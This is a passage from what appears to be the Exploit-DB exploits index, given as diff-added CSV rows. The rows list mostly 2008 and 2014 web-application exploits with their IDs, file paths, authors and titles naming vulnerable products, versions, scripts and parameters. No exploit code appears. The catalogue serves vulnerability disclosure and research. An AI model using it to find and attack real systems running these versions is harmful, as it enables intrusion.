Inclusion",2008-04-09,bd0rk,webapps,php, +31636,exploits/php/webapps/31636.txt,"W2B PHPHotResources - 'cat.php' SQL Injection",2008-04-11,The-0utl4w,webapps,php, +31637,exploits/php/webapps/31637.txt,"W2B Dating Club - 'browse.php' SQL Injection",2008-04-11,The-0utl4w,webapps,php, +31640,exploits/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection",2008-04-13,S@BUN,webapps,php, +31641,exploits/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Cross-Site Scripting",2008-04-14,"Sebastien gioria",webapps,java, +31644,exploits/asp/webapps/31644.txt,"Cezanne 6.5.1/7 - 'cflookup.asp' Multiple Cross-Site Scripting Vulnerabilities",2008-04-14,"Juan de la Fuente Costa",webapps,asp, +31645,exploits/asp/webapps/31645.txt,"Cezanne 6.5.1/7 - 'CznCustomContainer.asp' Multiple Cross-Site Scripting Vulnerabilities",2008-04-14,"Juan de la Fuente Costa",webapps,asp, +31646,exploits/asp/webapps/31646.txt,"Cezanne 6.5.1/7 - 'home.asp?CFTARGET' Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",webapps,asp, +31647,exploits/multiple/webapps/31647.txt,"CA 2E Web Option 8.1.2 - Authentication Bypass",2014-02-13,"Mike Emery",webapps,multiple, +31648,exploits/asp/webapps/31648.txt,"Cezanne 7 - 'cflookup.asp?FUNID' SQL Injection",2008-04-14,"Juan de la Fuente Costa",webapps,asp, +31649,exploits/asp/webapps/31649.txt,"Cezanne 7 - '/CznCommon/CznCustomContainer.asp?FUNID' SQL Injection",2008-04-14,"Juan de la Fuente Costa",webapps,asp, +31650,exploits/asp/webapps/31650.txt,"Cezanne Software 6.5.1/7 - 'CFLogon.asp' Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",webapps,asp, +31651,exploits/php/webapps/31651.txt,"amfPHP 1.2 - '/browser/methodTable.php?class' Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",webapps,php, +31652,exploits/php/webapps/31652.txt,"amfPHP 1.2 - '/browser/code.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-15,"Alberto Cuesta Partida",webapps,php, +31653,exploits/php/webapps/31653.txt,"amfPHP 1.2 - '/browser/details?class' Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",webapps,php, +31654,exploits/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Remote File Inclusion",2008-04-15,THuM4N,webapps,php, +31655,exploits/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Inclusion",2008-04-15,THuGM4N,webapps,php, +31658,exploits/php/webapps/31658.txt,"MyBoard 1.0.12 - 'rep.php' Cross-Site Scripting",2008-04-17,ZoRLu,webapps,php, +31659,exploits/php/webapps/31659.txt,"PHP-Stats 0.1.9.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-17,ZoRLu,webapps,php, +31660,exploits/php/webapps/31660.txt,"EsContacts 1.0 - 'add_groupe.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,webapps,php, +31661,exploits/php/webapps/31661.txt,"EsContacts 1.0 - 'contacts.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,webapps,php, +31662,exploits/php/webapps/31662.txt,"EsContacts 1.0 - 'groupes.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,webapps,php, +31663,exploits/php/webapps/31663.txt,"EsContacts 1.0 - 'importer.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,webapps,php, +31664,exploits/php/webapps/31664.txt,"EsContacts 1.0 - 'login.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,webapps,php, +31665,exploits/php/webapps/31665.txt,"EsContacts 1.0 - 'search.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,webapps,php, +31666,exploits/asp/webapps/31666.txt,"Cobalt 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,webapps,asp, +31668,exploits/php/webapps/31668.txt,"TLM CMS 3.1 - Multiple SQL Injections",2008-04-18,ZoRLu,webapps,php, +31669,exploits/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",webapps,php, +31670,exploits/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Directory Traversal",2008-04-18,"Gerendi Sandor Attila",webapps,php, +31671,exploits/php/webapps/31671.html,"TorrentFlux 2.3 - 'admin.php' Cross-Site Request Forgery (Add Admin)",2008-04-18,"Michael Brooks",webapps,php, +31672,exploits/php/webapps/31672.txt,"uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,webapps,php, +31673,exploits/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,webapps,multiple, +31674,exploits/php/webapps/31674.txt,"XOOPS Recette 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,webapps,php, +31676,exploits/php/webapps/31676.txt,"Host Directory PRO - Cookie Security Bypass",2008-04-20,Crackers_Child,webapps,php, +31677,exploits/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 - 'beg' Cross-Site Scripting",2008-04-21,ZoRLu,webapps,php, +31678,exploits/php/webapps/31678.txt,"SMF 1.1.4 - Audio CAPTCHA Security Bypass",2008-04-21,"Michael Brooks",webapps,php, +31679,exploits/php/webapps/31679.txt,"PortailPHP 2.0 - 'mod_search' Remote File Inclusion",2008-04-21,ZoRLu,webapps,php, +31714,exploits/php/webapps/31714.txt,"C-News 1.0.1 - 'install.php' Cross-Site Scripting",2008-04-30,ZoRLu,webapps,php, +31681,exploits/php/webapps/31681.py,"XOOPS 2.0.14 Article Module - 'article.php' SQL Injection",2008-04-21,Cr@zy_King,webapps,php, +31682,exploits/php/webapps/31682.txt,"S9Y Serendipity 1.3 - Referer HTTP Header Cross-Site Scripting",2008-04-22,"Hanno Boeck",webapps,php, +31686,exploits/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,webapps,multiple,80 +31690,exploits/hardware/webapps/31690.txt,"Trendchip HG520 ADSL2+ Wireless Modem - Cross-Site Request Forgery",2014-02-16,"Dhruv Shah",webapps,hardware,80 +31691,exploits/ios/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - Local File Inclusion",2014-02-16,Vulnerability-Lab,webapps,ios,8080 +31692,exploits/ios/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,webapps,ios,8080 +31693,exploits/ios/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,webapps,ios,8080 +31702,exploits/php/webapps/31702.txt,"PHP-Nuke DownloadsPlus Module - Arbitrary File Upload",2008-04-24,ZoRLu,webapps,php, +31703,exploits/php/webapps/31703.txt,"Pixel Motion Blog - 'list_article.php' Cross-Site Scripting",2008-04-24,ZoRLu,webapps,php, +31704,exploits/php/webapps/31704.txt,"PHCDownload 1.1 - '/admin/index.php?hash' SQL Injection",2008-04-24,ZoRLu,webapps,php, +31705,exploits/php/webapps/31705.txt,"PHCDownload 1.1 - '/upload/install/index.php?step' Cross-Site Scripting",2008-04-24,ZoRLu,webapps,php, +31708,exploits/php/webapps/31708.txt,"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion",2008-04-26,NoGe,webapps,php, +31709,exploits/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Cross-Site Scripting / Local File Inclusion",2008-04-26,"Khashayar Fereidani",webapps,php, +31716,exploits/php/webapps/31716.txt,"VWar 1.6.1 R2 - Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",webapps,php, +31717,exploits/php/webapps/31717.txt,"MJGUEST 6.7 - 'QT 'mjguest.php' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",webapps,php, +31719,exploits/php/webapps/31719.pl,"KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,webapps,php, +31720,exploits/php/webapps/31720.txt,"QT-cute QuickTalk Guestbook 1.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,webapps,php, +31721,exploits/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,"Khashayar Fereidani",webapps,php, +31722,exploits/php/webapps/31722.txt,"EJ3 BlackBook 1.0 - 'header.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,"Khashayar Fereidani",webapps,php, +31723,exploits/php/webapps/31723.txt,"Alumni 1.0.8/1.0.9 - 'info.php?id' SQL Injection",2008-05-02,hadihadi,webapps,php, +31724,exploits/php/webapps/31724.txt,"Alumni 1.0.8/1.0.9 - 'index.php?year' Cross-Site Scripting",2008-05-02,hadihadi,webapps,php, +31725,exploits/php/webapps/31725.txt,"Zen Cart 2008 - 'index.php?keyword' SQL Injection",2008-05-02,"Ivan Sanchez",webapps,php, +31726,exploits/php/webapps/31726.txt,"Zen Cart 2008 - 'index.php?keyword' Cross-Site Scripting",2008-05-02,"Ivan Sanchez",webapps,php, +31727,exploits/php/webapps/31727.txt,"Chicomas 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",webapps,php, +31729,exploits/php/webapps/31729.pl,"SiteXS CMS 0.1.1 - 'upload.php' Arbitrary File Upload",2008-05-03,"Hadi Kiamarsi",webapps,php, +31730,exploits/php/webapps/31730.txt,"GEDCOM_TO_MYSQL - '/PHP/prenom.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,ZoRLu,webapps,php, +31731,exploits/php/webapps/31731.txt,"GEDCOM_TO_MYSQL - '/PHP/index.php?nom_branche' Cross-Site Scripting",2008-05-05,ZoRLu,webapps,php, +31732,exploits/php/webapps/31732.txt,"GEDCOM_TO_MYSQL - '/PHP/info.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,ZoRLu,webapps,php, +31733,exploits/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,webapps,ios,50496 +32240,exploits/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",webapps,php, +31734,exploits/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",webapps,php,80 +31735,exploits/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php?cID' SQL Injection",2014-02-18,killall-9,webapps,php,80 +31738,exploits/php/webapps/31738.py,"Open Web Analytics 1.5.4 - 'owa_email_address' SQL Injection",2014-02-18,"Dana James Traversie",webapps,php, +31739,exploits/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injections",2008-05-05,ZoRLu,webapps,php, +31740,exploits/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",webapps,php, +31741,exploits/php/webapps/31741.txt,"Maian Uploader 4.0 - 'keywords' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",webapps,php, +31742,exploits/php/webapps/31742.txt,"Maian Uploader 4.0 - 'index.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",webapps,php, +31743,exploits/php/webapps/31743.txt,"Maian Uploader 4.0 - 'header.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",webapps,php, +31744,exploits/php/webapps/31744.txt,"osCommerce 2.1/2.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,"David Sopas Ferreira",webapps,php, +31745,exploits/php/webapps/31745.txt,"BatmanPorTaL - 'uyeadmin.asp?id' SQL Injection",2008-05-05,U238,webapps,php, +31746,exploits/php/webapps/31746.txt,"BatmanPorTaL - 'profil.asp?id' SQL Injection",2008-05-05,U238,webapps,php, +31747,exploits/php/webapps/31747.pl,"iGaming CMS 1.5 - 'poll_vote.php' SQL Injection",2008-05-05,Cod3rZ,webapps,php, +31749,exploits/php/webapps/31749.py,"RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injections",2008-05-06,The:Paradox,webapps,php, +31750,exploits/php/webapps/31750.txt,"QTO File Manager 1.0 - 'qtofm.php' Arbitrary File Upload",2008-05-06,"CrAzY CrAcKeR",webapps,php, +31751,exploits/php/webapps/31751.txt,"Sphider 1.3.4 - 'query' Cross-Site Scripting",2008-05-06,"Christian Holler",webapps,php, +31752,exploits/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Multiple Local File Inclusions",2008-05-07,Matrix86,webapps,php, +31753,exploits/php/webapps/31753.txt,"Tux CMS 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-07,"Hadi Kiamarsi",webapps,php, +31754,exploits/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 Bu (WGate) - 'wgate.dll?~service' Cross-Site Scripting",2008-05-08,Portcullis,webapps,cgi, +31755,exploits/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting",2008-05-08,Portcullis,webapps,cgi, +31760,exploits/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",webapps,windows,5081 +31764,exploits/hardware/webapps/31764.txt,"D-Link DIR-615 vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",webapps,hardware,80 +31765,exploits/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent Cross-Site Scripting",2014-02-19,Vulnerability-Lab,webapps,hardware,3378 +31768,exploits/php/webapps/31768.txt,"WordPress Plugin BP Group Documents 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",webapps,php,80 +31771,exploits/php/webapps/31771.txt,"cPanel 11.x - '/scripts2/knowlegebase?issue' Cross-Site Scripting",2008-05-09,"Matteo Carli",webapps,php, +31772,exploits/php/webapps/31772.txt,"cPanel 11.x - '/scripts2/changeip?user' Cross-Site Scripting",2008-05-09,"Matteo Carli",webapps,php, +31773,exploits/php/webapps/31773.txt,"cPanel 11.x - '/scripts2/listaccts?search' Cross-Site Scripting",2008-05-09,"Matteo Carli",webapps,php, +31774,exploits/php/webapps/31774.txt,"BlogPHP 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-10,"David Sopas Ferreira",webapps,php, +31775,exploits/php/webapps/31775.txt,"OtherLogic - 'vocourse.php' SQL Injection",2008-05-10,Breeeeh,webapps,php, +31776,exploits/php/webapps/31776.txt,"WordPress Plugin WP Photo Album - 'photo' SQL Injection",2008-05-09,THE_MILLER,webapps,php, +31777,exploits/php/webapps/31777.txt,"AJ Classifieds - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,webapps,php, +31778,exploits/php/webapps/31778.txt,"PHPInstantGallery 2.0 - 'index.php?Gallery' Cross-Site Scripting",2008-05-12,ZoRLu,webapps,php, +31779,exploits/php/webapps/31779.txt,"PHPInstantGallery 2.0 - 'image.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-12,ZoRLu,webapps,php, +31780,exploits/php/webapps/31780.txt,"CyrixMED 1.4 - 'index.php' Cross-Site Scripting",2008-05-12,ZoRLu,webapps,php, +31781,exploits/php/webapps/31781.txt,"IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injections",2008-05-12,SkyOut,webapps,php, +31782,exploits/php/webapps/31782.txt,"Claroline 1.7.5 - Multiple Remote File Inclusions",2008-05-12,MajnOoNxHaCkEr,webapps,php, +31783,exploits/php/webapps/31783.txt,"Fusebox 5.5.1 - 'fusebox5.php' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,webapps,php, +31784,exploits/php/webapps/31784.txt,"phpMyAgenda 2.1 - 'infoevent.php3' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,webapps,php, +31787,exploits/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal - 'linking.page.php' SQL Injection",2008-05-13,HaCkeR_EgY,webapps,php, +31790,exploits/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,webapps,hardware, +31792,exploits/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,webapps,php,80 +31793,exploits/php/webapps/31793.txt,"Horde Turba 3.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-14,"Ivan Javier Sanchez",webapps,php, +31794,exploits/php/webapps/31794.txt,"PicsEngine 1.0 - 'index.php' Cross-Site Scripting",2008-05-14,ZoRLu,webapps,php, +31795,exploits/php/webapps/31795.txt,"Links Pile - 'link.php' SQL Injection",2008-08-14,HaCkeR_EgY,webapps,php, +31797,exploits/asp/webapps/31797.txt,"philboard 0.5 - 'W1L3D4_foruma_yeni_konu_ac.asp?forumid' SQL Injection",2008-05-14,U238,webapps,asp, +31798,exploits/php/webapps/31798.txt,"philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection",2008-05-14,U238,webapps,php, +31799,exploits/php/webapps/31799.txt,"philboard 0.5 - 'W1L3D4_konuya_mesaj_yaz.asp' Multiple SQL Injections",2008-05-14,U238,webapps,php, +31800,exploits/php/webapps/31800.pl,"SunShop Shopping Cart 3.5.1 - 'index.php' SQL Injection",2008-05-15,irvian,webapps,php, +31801,exploits/php/webapps/31801.txt,"ACGV News 0.9.1 - 'glossaire.php?id' SQL Injection",2008-05-16,ZoRLu,webapps,php, +31802,exploits/php/webapps/31802.txt,"ACGV News 0.9.1 - 'glossaire.php?id' Cross-Site Scripting",2008-05-16,ZoRLu,webapps,php, +31803,exploits/php/webapps/31803.txt,"AN Guestbook 0.4 - 'send_email.php' Cross-Site Scripting",2008-05-16,ZoRLu,webapps,php, +31804,exploits/php/webapps/31804.txt,"Digital Hive 2.0 - 'base_include.php' Local File Inclusion",2008-05-16,ZoRLu,webapps,php, +31805,exploits/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module - 'sid' SQL Injection",2008-05-17,Lovebug,webapps,php, +31806,exploits/php/webapps/31806.txt,"bcoos 1.0.13 - 'file' Local File Inclusion",2008-05-19,Lostmon,webapps,php, +31807,exploits/php/webapps/31807.txt,"cPanel 11.21 - 'wwwact' Privilege Escalation",2008-05-19,"Ali Jasbi",webapps,php, +31808,exploits/php/webapps/31808.txt,"AppServ Open Project 2.5.10 - 'appservlang' Cross-Site Scripting",2008-05-20,"CWH Underground",webapps,php, +31809,exploits/php/webapps/31809.txt,"Starsgames Control Panel 4.6.2 - 'index.php' Cross-Site Scripting",2008-05-20,"CWH Underground",webapps,php, +31810,exploits/php/webapps/31810.txt,"Web Slider 0.6 - 'slide' SQL Injection",2008-05-20,"fahn zichler",webapps,php, +31811,exploits/asp/webapps/31811.txt,"Site Tanitimlari Scripti - Multiple SQL Injections",2008-05-20,"fahn zichler",webapps,asp, +31812,exploits/asp/webapps/31812.txt,"DizaynPlus Nobetci Eczane Takip 1.0 - 'ayrinti.asp' SQL Injection",2008-05-20,U238,webapps,asp, +31813,exploits/php/webapps/31813.txt,"eCMS 0.4.2 - Multiple Vulnerabilities",2008-05-20,hadihadi,webapps,php, +31816,exploits/java/webapps/31816.txt,"SAP Web Application Server 7.0 - '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting",2008-05-21,DSecRG,webapps,java, +31821,exploits/php/webapps/31821.txt,"PHPFreeForum 1.0 rc2 - 'error.php?message' Cross-Site Scripting",2008-05-22,tan_prathan,webapps,php, +31822,exploits/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - '/part/menu.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,tan_prathan,webapps,php, +31823,exploits/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - '/cms/includes/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"CWH Underground",webapps,php, +31824,exploits/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - '/cms/includes/login.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"CWH Underground",webapps,php, +31825,exploits/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' Cross-Site Scripting",2008-05-22,"CWH Underground",webapps,php, +31826,exploits/php/webapps/31826.txt,"BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting",2008-05-22,"CWH Underground",webapps,php, +31827,exploits/php/webapps/31827.txt,"BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting",2008-05-22,"CWH Underground",webapps,php, +31829,exploits/php/webapps/31829.txt,"AbleDating 2.4 - 'search_results.php?keyword' SQL Injection",2008-05-22,"Ali Jasbi",webapps,php, +31830,exploits/php/webapps/31830.txt,"AbleDating 2.4 - 'search_results.php?keyword' Cross-Site Scripting",2008-05-22,"Ali Jasbi",webapps,php, +32045,exploits/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,webapps,php, +31833,exploits/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,webapps,php,80 +31834,exploits/php/webapps/31834.txt,"WordPress Plugin AdRotate 3.9.4 - 'clicktracker.ph?track' SQL Injection",2014-02-22,"High-Tech Bridge SA",webapps,php,80 +31835,exploits/php/webapps/31835.txt,"Apple Safari Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",webapps,php, +31836,exploits/php/webapps/31836.txt,"WordPress Plugin Upload File - 'wp-uploadfile.php' SQL Injection",2008-05-24,eserg.ru,webapps,php, +31837,exploits/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' SQL Injection",2008-05-24,"Ali Jasbi",webapps,php, +31838,exploits/php/webapps/31838.txt,"Horde Multiple Product - 'workweek.php?Timestamp' Cross-Site Scripting",2008-05-24,"Ivan Sanchez",webapps,php, +31839,exploits/php/webapps/31839.txt,"Horde Multiple Product - 'week.php?Timestamp' Cross-Site Scripting",2008-05-24,"Ivan Sanchez",webapps,php, +31840,exploits/php/webapps/31840.txt,"Horde Multiple Product - 'day.php?Timestamp' Cross-Site Scripting",2008-05-24,"Ivan Sanchez",webapps,php, +31841,exploits/php/webapps/31841.txt,"miniCWB 2.1.1 - 'connector.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-26,"CWH Underground",webapps,php, +31842,exploits/php/webapps/31842.txt,"AbleSpace 1.0 - 'adv_cat.php' SQL Injection",2008-05-26,Jasbi,webapps,php, +31843,exploits/asp/webapps/31843.txt,"Excuse Online - 'pwd.asp' SQL Injection",2008-05-26,Unohope,webapps,asp, +31844,exploits/php/webapps/31844.txt,"PHPFix 2.0 - '/fix/browse.php?kind' SQL Injection",2008-05-26,Unohope,webapps,php, +31845,exploits/php/webapps/31845.txt,"PHPFix 2.0 - '/auth/00_pass.php?account' SQL Injection",2008-05-26,Unohope,webapps,php, +31846,exploits/php/webapps/31846.txt,"ClassSystem 2.0/2.3 - 'HomepageTop.php?teacher_id' SQL Injection",2008-05-26,Unohope,webapps,php, +31847,exploits/php/webapps/31847.txt,"ClassSystem 2.0/2.3 - 'HomepageMain.php?teacher_id' SQL Injection",2008-05-26,Unohope,webapps,php, +31848,exploits/php/webapps/31848.txt,"ClassSystem 2.0/2.3 - 'MessageReply.php?teacher_id' SQL Injection",2008-05-26,Unohope,webapps,php, +31849,exploits/php/webapps/31849.html,"ClassSystem 2.0/2.3 - 'class/ApplyDB.php' Unrestricted Arbitrary File Upload / Arbitrary Code Execution",2008-05-26,Unohope,webapps,php, +31850,exploits/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - '/post3/book.asp?review' Cross-Site Scripting",2008-05-26,Unohope,webapps,asp, +31851,exploits/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - '/post3/view.asp?id' SQL Injection",2008-05-26,Unohope,webapps,asp, +31852,exploits/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - '/post3/book.asp?review' SQL Injection",2008-05-26,Unohope,webapps,asp, +31854,exploits/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 - 'sentout.asp' Unauthorized Access",2008-05-26,Unohope,webapps,asp, +31855,exploits/php/webapps/31855.txt,"Tr Script News 2.1 - 'news.php' Cross-Site Scripting",2008-05-27,ZoRLu,webapps,php, +31857,exploits/php/webapps/31857.txt,"Joomla! / Mambo Component Artists - 'idgalery' SQL Injection",2008-05-28,Cr@zy_King,webapps,php, +31858,exploits/php/webapps/31858.txt,"Calcium 3.10/4.0.4 - 'Calcium40.pl' Cross-Site Scripting",2008-05-28,"Marvin Simkin",webapps,php, +31859,exploits/asp/webapps/31859.txt,"JustPORTAL 1.0 - 'site' Multiple SQL Injections",2008-05-29,"Ugurcan Engin",webapps,asp, +31860,exploits/asp/webapps/31860.txt,"Proje ASP Portal 2.0 - 'id' Multiple SQL Injections",2008-05-29,"Ugurcan Engin",webapps,asp, +31861,exploits/asp/webapps/31861.txt,"dvbbs 8.2 - 'login.asp' Multiple SQL Injections",2008-05-29,hackerbinhphuoc,webapps,asp, +31865,exploits/asp/webapps/31865.txt,"DotNetNuke 4.8.3 - 'Default.aspx' Cross-Site Scripting",2008-05-30,"AmnPardaz Security Research Team",webapps,asp, +31866,exploits/php/webapps/31866.txt,"TorrentTrader Classic 1.x - 'scrape.php' SQL Injection",2008-05-31,"Charles Vaughn",webapps,php, +31867,exploits/php/webapps/31867.php,"CMS Easyway - 'mid' SQL Injection",2008-05-30,Lidloses_Auge,webapps,php, +31868,exploits/php/webapps/31868.txt,"OtomiGenX 2.2 - 'userAccount' SQL Injection",2008-06-02,hadihadi,webapps,php, +31869,exploits/asp/webapps/31869.txt,"i-pos StoreFront 1.3 - 'index.asp' SQL Injection",2008-06-02,KnocKout,webapps,asp, +31870,exploits/php/webapps/31870.pl,"Joomla! / Mambo Component Joo!BB 0.5.9 - 'forum' SQL Injection",2008-06-02,His0k4,webapps,php, +31871,exploits/asp/webapps/31871.txt,"Te Ecard - 'id' Multiple SQL Injections",2008-06-02,"Ugurcan Engyn",webapps,asp, +31874,exploits/jsp/webapps/31874.py,"Ganib Project Management 2.3 - SQL Injection",2014-02-24,drone,webapps,jsp,80 +31880,exploits/php/webapps/31880.txt,"WyMIEN PHP 1.0 - 'index.php' Cross-Site Scripting",2008-06-04,ZoRLu,webapps,php, +31881,exploits/php/webapps/31881.txt,"PHP Address Book 3.1.5 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-06-04,"CWH Underground",webapps,php, +31882,exploits/php/webapps/31882.txt,"SamTodo 1.1 - 'tid' Cross-Site Scripting",2008-06-05,"David Sopas Ferreira",webapps,php, +31883,exploits/php/webapps/31883.txt,"SamTodo 1.1 - 'completed' Cross-Site Scripting",2008-06-05,"David Sopas Ferreira",webapps,php, +31888,exploits/php/webapps/31888.txt,"SchoolCenter 7.5 - Multiple Cross-Site Scripting Vulnerabilities",2008-06-06,Doz,webapps,php, +31891,exploits/asp/webapps/31891.txt,"Real Estate Website 1.0 - 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,webapps,asp, +31892,exploits/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 - 'p' Cross-Site Scripting",2008-06-10,Unohope,webapps,cgi, +31893,exploits/php/webapps/31893.txt,"Hot Links SQL-PHP - Multiple Cross-Site Scripting Vulnerabilities",2008-06-10,sl4xUz,webapps,php, +31894,exploits/hardware/webapps/31894.txt,"Technicolor TC7200 - Credentials Disclosure",2014-02-25,"Jeroen - IT Nerdbox",webapps,hardware,80 +31896,exploits/ios/webapps/31896.txt,"WiFiles HD 1.3 iOS - Local File Inclusion",2014-02-25,Vulnerability-Lab,webapps,ios,8080 +31898,exploits/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection",2014-02-25,Hurley,webapps,php,80 +31900,exploits/ios/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,webapps,ios, +31902,exploits/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,webapps,php, +31904,exploits/php/webapps/31904.txt,"PHPEasyData 1.5.4 - 'annuaire.php?annuaire' SQL Injection",2008-06-11,"Sylvain THUAL",webapps,php, +31905,exploits/php/webapps/31905.txt,"PHPEasyData 1.5.4 - '/admin/login.php?Username' SQL Injection",2008-06-11,"Sylvain THUAL",webapps,php, +31906,exploits/php/webapps/31906.txt,"PHPEasyData 1.5.4 - 'last_records.php?annuaire' Cross-Site Scripting",2008-06-11,"Sylvain THUAL",webapps,php, +31907,exploits/php/webapps/31907.txt,"PHPEasyData 1.5.4 - 'annuaire.php' Multiple Cross-Site Scripting Vulnerabilities",2008-06-11,"Sylvain THUAL",webapps,php, +31908,exploits/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,webapps,php, +31910,exploits/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Cross-Site Scripting",2008-06-13,anonymous,webapps,php, +31916,exploits/php/webapps/31916.txt,"Piwigo 2.6.1 - Cross-Site Request Forgery",2014-02-26,killall-9,webapps,php,80 +31929,exploits/php/webapps/31929.txt,"SimpleNotes - Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,sl4xUz,webapps,php, +31933,exploits/php/webapps/31933.txt,"OpenDocMan 1.x - 'out.php' Cross-Site Scripting",2008-06-17,"Sergi 